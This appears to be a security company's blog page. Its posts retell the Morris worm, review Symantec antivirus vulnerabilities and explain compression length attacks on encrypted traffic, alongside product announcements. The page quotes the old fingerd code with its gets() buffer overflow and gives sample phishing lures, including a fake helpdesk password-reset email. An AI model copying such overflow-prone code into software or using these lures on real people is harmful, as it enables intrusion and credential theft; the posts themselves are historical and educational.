A tale of two worms, three vulnerabilities, and one National Security Agency

By Max Veytsman | August 24, 2016 on vihkal, security

Paranoia is natural for security practitioners.

Hacking can feel like being initiated into a secret society of wizards. Once you’re in, you get access to an addictive drug that gives you super powers. But there are other wizards out there; some are good but many practice black magic. And the NSA’s school of the dark arts has a seemingly unlimited budget.

It’s natural to get a little paranoid. Experience shows you that with the right incantation you can turn crashes into working exploits. It follows that every time your computer crashes there could be someone in the shadows, chanting the right incantation. The paranoia can be all-consuming; just because you’re paranoid doesn’t mean they’re not out to get you.

In October 2013, a well known computer security expert named Dragos Ruiu came out with a story. He found that his computers had been behaving oddly, and that the symptoms he was seeing were impossible to eradicate. This was some kind of worm, since the behavior would replicate across air gapped computers in his lab. He theorized that he was infected with a super advanced piece of malware that lived in the BIOS and could spread by sending ultrasonic frequencies from speaker to microphone, undetectable to the human ear. It looked like the work of the NSA or someone equally omnipotent. He dubbed it badBIOS.

Everything Dragos claimed badBIOS could do is at least possible, and most security folks know this. Malware in the BIOS is feasible, and beyond being a research topic, it’s something we know the NSA does. In fact, because of the hype, many people developed ultrasound networking libraries just to demonstrate how viable it is.

Dragos Ruiu imaged his computer and made a lot of data available to the community for peer review, but unfortunately no credible researcher1 has publicly confirmed his findings. Maybe there was something going on. Maybe he was seeing patterns in the noise. Either way, it says something about the world today that when you’re a security expert and your computer starts behaving weirdly, the obvious culprit is the NSA.

It made me think of a different worm, from a more innocent time.

Morris Worm

The Morris Worm

It’s November 2nd 1988, almost exactly 25 years before badBIOS became a hashtag. Robert Tappan Morris, a graduate student at Cornell, executes some code he’d been working on and goes to dinner. The aftermath was a self-replicating computer worm that infected 10% of the Internet2 at the time — a whopping 6,000 computers!

Morris claimed that he wrote his program to map the size of the Internet. And indeed, each infection would send a byte to a machine in Berkeley (hiding the trail to Morris, in Cornell, as the author). Unfortunately, there was a bug that caused it to propagate too aggressively: it infected the same computer multiple times, which resulted in a denial of service attack across the whole Internet. Furthermore, the code to report infections had a bug in it. It tried to send a UDP packet over a TCP socket, making it useless for reporting the Internet’s size.

An alternative explanation is that Morris was trying to bring to wider attention some long-standing bugs in the Internet. As Morris’ friend and future co-founder put it, in classic pg3 style:

Mr. Graham, who has known the younger Mr. Morris for several years, compared his exploit to that of Mathias Rust, the young German who flew light plane through Soviet air defenses in May 1987 and landed in Moscow.

“It’s as if Mathias Rust had not just flown into Red Square, but built himself a stealth bomber by hand and then flown into Red Square,” he said.

What did the Morris Worm actually do?

The Morris Worm4 exploited three separate vulnerabilities. It guessed passwords for rsh/rexec, it exploited a debug-mode backdoor in sendmail and it used “one very neat trick”. I’ll go over each of these in detail, and you can find an archive (decompiled and commented) of the code for yourself here.

1. Rsh and Rexec

rsh and rexec are remote shell protocols from the BSD era that are almost unused today (since supplanted by ssh). rsh can allow passwordless authentication if coming from a “trusted” host, which it determines via a list of addresses stored in a global /etc/hosts.equiv or per-user .rhosts file. When an rsh request comes from a user of a trusted machine, access is automatically granted. The worm used this to propagate, searching those two files — as well as the .forward file, which back then was used to forward your mail around the Internet — for trusted hosts.

Even in 1988, people knew that leaving rsh open on an untrusted network like the Internet was a Bad Idea, and so the worm also propagated via rexec. Now, rexec uses password authentication, but Morris made an intelligent assumption: people tend to reuse passwords. Back then, /etc/passwd used to5 store everyone’s encrypted passwords. The worm shipped with an optimized implementation of crypt and a dictionary, and went to town. Once it cracked a password, it tried it against all the likely hosts it could find.

2. Sendmail’s Backdoor

In the absence of any friendly hosts, the Morris Worm would then exploit a backdoor in Sendmail. You see, Sendmail had a “debug” mode that allowed anyone to route an email to any process, including the shell! Ironically, this was apparently deliberate:

Eric Allman, a computer programmer who designed the mail program that Morris exploited, said yesterday that he created the back door to allow him to fine tune the program on a machine that an overzealous administrator would not give him access to. He said he forgot to remove the entry point before the program was widely distributed in 1985.

(This wasn’t even the first Sendmail backdoor. Sendmail used to ship with “wizard mode”, where sending the strings “WIZ” and “SHELL” gave you a root shell. By the time that Morris was writing his worm, wizard mode was disabled almost everywhere.)

If you’re wondering how sendmail could have backdoors like this, it seems that it was somewhat well known. This quote from a mail by Paul Vixie summarizes the situation.

From: vixie@decwrl.dec.com (Paul Vixie)
Newsgroups: comp.protocols.tcp-ip,comp.unix.wizards
Subject: Re: a holiday gift from Robert "wormer" Morris
Message-ID: <24@jove.dec.com>
Date: 6 Nov 88 19:36:10 GMT
References: <1698@cadre.dsl.PITTSBURGH.EDU> <2060@spdcc.COM>
Distribution: na
Organization: DEC Western Research Lab
Lines: 15


# the hole [in sendmail] was so obvious that i surmise that Morris
# was not the only one to discover it.  perhaps other less
# reproductively minded arpanetters have been having a field
# 'day' ever since this bsd release happened. 

I've known about it for a long time.  I thought it was common knowledge
and that the Internet was just a darned polite place.  (I think it _was_
common knowledge among the people who like to diddle the sendmail source.)

The bug in fingerd was a big surprise, though.  Overwriting a stack frame
on a remote machine with executable code is One Very Neat Trick.
-- 
Paul Vixie
Work:    vixie@decwrl.dec.com    decwrl!vixie    +1 415 853 6600
Play:    paul@vixie.sf.ca.us     vixie!paul      +1 415 864 7013

The Internet was a polite place, indeed.

3. One Very Neat Trick

The Very Neat Trick that Vixie was talking about is the now-standard stack buffer overflow. It’s fascinating to read contemporary accounts that marvel at the cleverness of a class of bugs that are now ubiquitous — although, for me at least, they still haven’t lost their magic6.

Here’s the main routine from the fingerd of that era:

main(argc, argv)
    char *argv[];
{
    register char *sp;
    char line[512];
    struct sockaddr_in sin;
    int i, p[2], pid, status;
    FILE *fp;
    char *av[4];

    i = sizeof (sin);
    if (getpeername(0, &sin, &i) < 0)
        fatal(argv[0], "getpeername");
    line[0] = '\0';
    gets(line);
    sp = line;
    // ... snip ...
    // build sp into arguments for finger 
    // and call /usr/ucb/finger via execv before
    // putchar'ing the result back to stdout
    return(0);
} 

If you have experience with reading C code,7 you may have spotted the vulnerability. gets(line) reads STDIN and puts the contents into a 512 byte buffer. This means that sending more than 512 bytes will overwrite the stack with an attacker-controlled value.

The worm sent 536 bytes of data, which overwrote the stack frame of the main function. This allowed Morris to overwrite the pointer to where main is returning to. He set that pointer to be within the 536 byte buffer he sent over the network. The beginning of the buffer contained shellcode that called /bin/sh. Game over.

Aftermath

Robert Tappan Morris was convicted and sentenced to three years probation, 400 hours of community service and a $10,050 fine (about $20,000 in today’s dollars) plus the cost of his supervision. He then went on to co-found a little startup called Viaweb. You may have heard the rest of that story. Today, Morris is a tenured professor at the Computer Science and Artificial Intelligence Laboratory at MIT and is one of the leaders of the Parallel and Distributed Systems Groups.

Why did the paranoia around badBIOS make me think of the Morris Worm? If you read contemporary articles about the Morris Worm, they’ll sometimes mention, but never emphasize, who Robert Morris’s father was. The elder Robert Morris just happened to be a computer security expert. While the young Robert Morris was writing his worm, Robert Morris Sr. was serving as Chief Scientist at the NSA’s National Computer Security Center!

The Internet grew up a lot since 1988, and not just in size. In 2013, your computer acting strangely is obviously a NSA-written malware that lives in your BIOS and propagates over sound waves imperceptible to the human ear. In 1988, son of an NSA security executive infects 10% of the Internet with a worm that uses an exotic new exploitation technique called a buffer overflow and… nothing.

Just to be clear, I’m not alleging any conspiracy between father and son, besides perhaps father making some calls after son’s arrest. While the Morris worm was likely the first malicious use, buffer overflows were understood as a problem before 1988, if not widely. The way the media narrative handled the NSA connection in 1988 just says a lot about how the world of the Internet changed in 25 years.

As for Dragos Ruiu, he’s been quiet about badBIOS since 2013. I’m not sure what he’s doing these days besides CanSecWest, but in my heart of hearts, I like to picture him playing the saxophone amidst the detritus of his torn up apartment.


Paying the Bills

We’re trying our best, but we’ll only be able to blog about a minuscule percentage of the world’s vulnerabilities. And starting with 1988 means we have a lot of catching up to do. How will you ever find about the ones that actually affect you?

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!



  1. One of the things I wish that the security industry would do less of is blind appeals to authority, and I hate that I made one here. Unfortunately, I don’t have the skills or time to make my own analysis of Ruiu’s data, so I just have to trust the Thought Leaders on this one.  

  2. The 60,000 computer-strong Internet was of course one of many networks at the time. The Internet was the one that was global and used TCP/IP — the Internet protocols. Therein lies the pedant’s case against the AP’s capitalization of the word “Internet”. 

  3. Disclosure time: years after giving that quote, Paul Graham and Robert Morris went on to found Y Combinator along with Jessica Livingston and Trevor Blackwell. YC in turn is an investor in Appcanary. Robert Morris and I have never met, though we did once meet with Paul Graham.  

  4. My favourite paper on the analysis of the worm is With Microscope and Tweezers from MIT’s Eichin and Rochlis. They spend a page passionately arguing that it’s a virus by using a complicated appeal to the difference between lytic and lysogenic viruses with references to three separate biology textbooks! 

  5. I assumed that /etc/shadow came about as a consequence of the Morris Worm, but it seems that it was originally implemented in SunOS earlier in the 80’s, and then took 2 years after the Morris Worm to make it into BSD. 

  6. Exploits really are magic, and it goes without saying that exploit users have chosen the Left-Hand Path to wizardhood. If the cover of SICP is to be believed, the Right-Hand Path is available through careful study of functional programming and Lisps. Perhaps this is the true reason why Morris and Graham were such effective collaborators. 

  7. On the other hand, this C code is over 30 years old. When I ran it through the gcc on my machine,I was very happy to see that it complained bitterly but still compiled it. One exercise for the reader is finding where the network operation actually happens. main takes input and output from STDIN/STDOUT, but there’s an uninitialized struct sockaddr_in sin that we call getpeername on. How is a network socket piped to standard input/output and who is initializing the sin struct? I actually haven’t been able to figure this part out. If you know, please tell me! The full code listing is here

    Update 08/29/2016 Dave Vandervies emailed me with an explanation!

    fingerd was meant to be run from inetd (see here), which sets up the network connection and invokes the actual server process with its stdin and stdout attached to the network socket.


    As for the getpeername, the address is an out parameter; this call looks up the peer address of stdin (fd 0), and will fail (and fingerd will error out on that) if it isn’t a socket (see here). Since the actual address doesn’t get used, that appears to be the purpose of the call here.


Making Appcanary easier to use

By Max Veytsman | July 14, 2016 on Announcements, Product

I’m excited to announce that we’ve added two features that make Appcanary a heck of a lot easier to use!

Add monitors by uploading a file

Our Monitor API is great if you want to track a set of Linux packages or your Gemfile. We give you a dashboard showing which packages are vulnerable, and email you whenever new vulnerabilities that affect you come out. However, there’s always a bunch of setup to get a new API going.

With that in mind, we made the interface a lot more user friendly! You can now upload a file to watch directly through the website. Just go to add monitors to be able to upload a file directly. Monitors support Ruby’s Gemfile.lock, /var/lib/dpkg/status for Ubuntu and Debian, and the output of rpm -qa for Centos and Amazon Linux!

Automatically upgrade vulnerable packages

A few of our customers told us that knowing about vulnerabilities is nice, but you know what would be great? If we could somehow patch them automatically. We thought about it and said, sure, why not!

If you have the Appcanary agent installed on an Ubuntu server, and you’re running the latest version, you can run

appcanary upgrade

in order to install updates for any packages we know to be vulnerable.

You can also run

appcanary upgrade -dry-run

in order to see what the agent will do, without it actually touching your system.

Now you can manage vulnerabilities, learn about new ones that affect you, and apply patches, all through Appcanary!

If you haven’t tried us yet

Stay on top of the security vulnerabilities that affect you, today.

Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on. And now it will help you patch vulnerable packages as well.

Sign up today!


Vulnerabilities I Have Known and Loved #1: Symantec's Bad Week

By Max Veytsman | July 07, 2016 on vihkal, security

tl;dr: If you use software with “Symantec” or “Norton” somewhere in its name, stop what you’re doing and upgrade.

Back in my security consulting days, a mentor taught me One Weird Trick to increase conversions on your phishing campaign. It goes like this: set up an email server, get as many employee addresses you can find, and spoof a mass message that reads:

Hello this is your boss.

I’m going to fire someone next week and you get to vote on who! To get your arch-nemisis fired, please log into this website that looks exactly like our company portal, but has one character in the domain name mispelled.

Thanks, Your Boss.

Then you sit back and count how many people fell for it.

The executive who hired you is happy because they get to demonstrate the value of increasing their security budget. The consultancy you work for is happy, because they get to upsell a bunch of “security awareness training”.

Soon, you’ll be spending three days telling your victims about the importance of that little green lock in their browser’s address bar (but only when it’s in the right place!) and that they should never ever click on links, never open attachments, and if at all possible, stop using computers altogether. Everybody wins.

Obviously, everyone at this stage wants to increase the conversion rate1 of these phishing emails. This is where The One Weird Trick comes in: after you send out your first campaign, you craft another one. Before you know it, everyone on your list receives a helpful tip from the IT Helpdesk:

Hi,

We’ve heard reports of a phishing campaign being waged against us. Don’t open those emails! It’s critically important that you reset your password to protect against those evil hackers who tried to phish us.

Click here to do it!

It turns out that round two gets way more clicks than round one. Most people will figure out that email #1 is a little fishy. Email #2 manages to reaffirm that, and so they dutifully click, like lambs to slaughter.

This is the phishing equivalent of the Double Tap. No, not the one from Zombieland. The Double Tap I’m talking about is a controversial military technique where after attacking a target, you follow up by sending another missile at the first responders. You do some damage, and then attack the response to that damage.

Symantec is Having a Bad Week

Last week Tavis Ormandy dropped 8 vulns against every single Symantec/Norton antivirus product. Judging by the press, things are not looking good for them.

You can find a writeup up on the Google Project Zero blog, and the issues for all 8 vulnerabilities can be found here. They’re all remotely exploitable,2 and they all should give an attacker remote code execution as root/SYSTEM (and in ring 0 for one of them to boot!)

If you’re using a Symantec product I can’t stress this enough: stop what you’re doing and upgrade.

These vulnerabilities reminded me of phishing and the Double Tap for two reasons. First, every one of these vulns can be exploited by just sending an email. Since the product is an antivirus, so it’s going to scan every file that touches your disk and every email you get for viruses. You don’t have to get your target to click a link or even open the message you sent — Symantec will happily try to parse every email you receive.

Second, the stack overflow in Symantec’s PowerPoint parser depends on a Double Tap-like attack! This parser is used to extract metadata and macros from PowerPoint decks (and presumably scan them for known malware) by exposing an I/O abstraction layer — which it then caches for performance. Tavis found that he could get that cache into a misaligned state, which resulted in the stack buffer overflow.

This vulnerable codepath is in something called “Bloodhound Heuristics”, which Symantec promotes as a more advanced set of malware detection checks. Since they’re not always run, you’d think that the vulnerability wouldn’t be very exploitable. And yet, it can be targetted every time! Under the default configuration, the system dynamically decides which set of checks to run. All Tavis had to do was try a bunch of known PowerPoint malware, see which one triggered the automatic mode to turn on “Bloodhound Heuristics,” and put his payload into them.

The exploit pretends to be a certain kind of known malware in order to trigger some special aggressive checks, which are the exploit’s true target. The Double Tap!

Vulnerability Management

While the above vulnerability is pretty cool, the Symantec bugs that are most interesting to us at Appcanary are CVE-2016-2207 and CVE-2016-2211.

Symantec was shipping its product with out of date versions of libmspack and unrarsrc. Out of date versions that have dozens of known vulnerabilities with public exploits! All Tavis had to do was download public exploits for these known vulnerabilities, and he had an attack against Symantec.

Ironically, Symantec sells a product called Enterprise Vulnerability Management! This is a hard problem for everyone. At Appcanary, we’re working on solving it.

P.S.

Do you have suggestions for vulnerabilities you’d like me to write about? You can let me know at max@appcanary.com.


Paying the Bills

One quarter of the critical vulnerabilities found in Symantec’s products last week were there because they relied on out-of-date libraries with known security holes.

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!


  1. You know, it’s interesting that before I became the CEO of a startup, the only time I thought about “conversion rates” of emails in my career was when I was involved in phishing campaigns. 

  2. I’m going to well-actually myself here so you don’t have to. Tavis gives a clear path to exploit for 6 of the 8. Of the two that are left, one is a lack of bounds checking on an array index, and the other is an integer overflow bug. I’m going to go out on a limb and say I think both can lead to code execution. I can’t fault the researcher for not going further though; after you find the first 6 remote code executions, you stop feeling the need to keep proving the point… 


Should you encrypt or compress first?

By Max Veytsman | June 25, 2016 on security, crypto

Imagine this:

You work for a big company. Your job is pretty boring. Frankly, your talents are wasted writing boilerplate code for an application whose only users are three people in accounting who can’t stand the sight of you.

Your real passion is security. You read r/netsec every day and participate in bug bounties after work. For the past three months, you’ve been playing a baroque stock trading game that you’re winning because you found a heap-based buffer overflow and wrote some AVR shellcode to help you pick stocks.

Everything changes when you discover that what you had thought was a video game was actually a cleverly disguised recruitment tool. Mont Piper, the best security consultancy in the world, is hiring — and you just landed an interview!

A plane ride and an Uber later, you’re sitting across from your potential future boss: a slightly sweaty hacker named Gary in a Norwegian metal band t-shirt and sunglasses he refuses to take off indoors.

You blast through the first part of the interview. You give a great explanation of the difference between privacy and anonymity. You describe the same origin policy in great detail, and give three ways an attacker can get around it. You even whiteboard the intricacies of __fastcall vs __stdcall. Finally, you’re at the penultimate section, protocol security.

Gary looks you in the eyes and says: “You’re designing a network protocol. Do you compress the data and then encrypt it, or do you encrypt and then compress?” And then he clasps his hands together and smiles to himself.

A classic security interview question!


Take a second and think about it.

At a high level, compression tries to use patterns in data in order to reduce its size. Encryption tries to shuffle data in such a way that without the key, you can’t find any patterns in the data at all.

Encryption produces output that appears random: a jumble of bits with a lot of entropy. Compression doesn’t really work on data that appears random — entropy can actually be thought of as a measure of how “compressable” some data is.

So if you encrypt first, your compression will be useless. The answer must be to compress first! Even StackOverflow thinks so.


You start to say this to Gary, but you stop mid-sentence. An attacker sniffing encrypted traffic doesn’t get much information, but they do get to learn the length of messages. If they can somehow use that to learn more information about the message, maybe they can foil the encryption.

You start explaining this to Gary, and he interrupts you — “Oh you mean like the CRIME attack?”

“Yes!” you reply. You start to recall the details of it. All the SSL attacks with catchy names are mixed together in your mind, but you’re pretty sure that’s the one. They controlled some information that was being returned by the server, and used that to generate guesses for a secret token present in the response. The response was compressed in such a way that you could validate guesses for the secret by seeing how you affected the length of the compressed message. If the secret was AAAA and you guessed AAAA, the compressed-then-encrypted response will be shorter than if you guessed BBBB.

Gary looks impressed. “But what if the attacker can’t control any of the plaintext in any way? Is this kind of attack still possible?” he asks.


CRIME was a very cool demonstration of how compress-then-encrypt isn’t always the right decision, but my favorite compress-then-encrypt attack was published a year earlier by Andrew M. White, Austin R. Matthews, Kevin Z. Snow, and Fabian Monrose. The paper Phonotactic Reconstruction of Encrypted VoIP Conversations gives a technique for reconstructing speech from an encrypted VoIP call.

Basically, the idea is this: VoIP compression isn’t going to be a generic audio compression algorithm, because we can rely on some assumptions about human speech in order to compress more efficiently. From the paper:

Many modern speech codecs are based on variants of a well-known speech coding scheme known as code-excited linear prediction (CELP) [49], which is in turn based on the source-filter model of speech prediction. The source-filter model separates the audio into two signals: the excitation or source signal, as produced by the vocal cords, and the shape or filter signal, which models the shaping of the sound performed by the vocal tract. This allows for differentiation of phonemes; for instance, vowels have a periodic excitation signal while fricatives (such as the [sh] and [f] sounds) have an excitation signal similar to white noise [53].

In basic CELP, the excitation signal is modeled as an entry from a fixed codebook (hence code-excited). In some CELP variants, such as Speex’s VBR (variable bit rate) mode, the codewords can be chosen from different codebooks depending on the complexity of the input frame; each codebook contains entries of a different size. The filter signal is modeled using linear prediction, i.e., as a so-called adaptive codebook where the codebook entries are linear combinations of past excitation signals. The “best” entries from each codebook are chosen by searching the space of possible codewords in order to “perceptually” optimize the output signal in a process known as analysis-by-synthesis [53]. Thus an encoded frame consists of a fixed codebook entry and gain (coefficient) for the excitation signal and the linear prediction coefficients for the filter signal.

Lastly, many VoIP providers (including Skype) use VBR codecs to minimize bandwidth usage while maintaining call quality. Under VBR, the size of the codebook entry, and thus the size of the encoded frame, can vary based on the complexity of the input frame. The specification for Secure RTP (SRTP) [3] does not alter the size of the original payload; thus encoded frame sizes are preserved across the cryptographic layer. The size of the encrypted packet therefore reflects properties of the input signal; it is exactly this correlation that our approach leverages to model phonemes as sequences of lengths of encrypted packets.

That pretty much summarizes the paper. CELP + VBR means that message length is going to depend on complexity. Due to how linear prediction works, more information is needed to encode a drastic change in sound — like the pause between phonemes! This allows the authors to build a model that can break an encrypted audio signal into phonemes: that is, deciding which audio frames belong to which unit of speech.

They then built a classifier that, still only using the packet length information they started with, decides which segmented units of encrypted audio represent which actual phonemes. They then use a language model to correct the previous step’s output and segment the phoneme stream into words and then phrases.

The crazy thing is that this whole rigmarole works! They used a metric called METEOR and got scores of around .6. This is on a scale where <.5 is considered “interpretable by a human.” Considering that the threat vector here is a human using this technique to listen in on your encrypted VoIP calls — that’s pretty amazing!


Epilogue

After passing the rigorous all-night culture fit screening, you end up getting the job. Six months later, Mont Piper is sold to a large conglomerate. Gary refuses to trade in his Norwegian metal t-shirts for a button-down and is summarily fired. You now spend your days going on-site to a big bank, “advising” a team that hates your guts.

But recently, you’ve picked up machine learning and found this really cool online game where you try to make a 6-legged robot walk in a 3d physics simulation…


P.S.


Paying the Bills

Vulnerabilities come out every day, and most don’t get blog posts like this written about them.

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!


Appcanary now supports Debian!

By Max Veytsman | June 24, 2016 on Announcements, Product

I’m excited to announce that Appcanary now fully supports Debian. If you install our agent on a Debian server, we will email you notifications whenever any package you have installed on your system has a known vulnerability. We track over 24,000 vulnerabilities already!

You can also use our Check API to verify if your Debian server has any vulnerable packages, and our Monitor API to register to receive notifications if a set of Debian packages ever has new vulnerabilities.

If you’re not a current user and want to try out Appcanary for Debian, you can sign up!

You can always let us know what you think at hello@appcanary.com.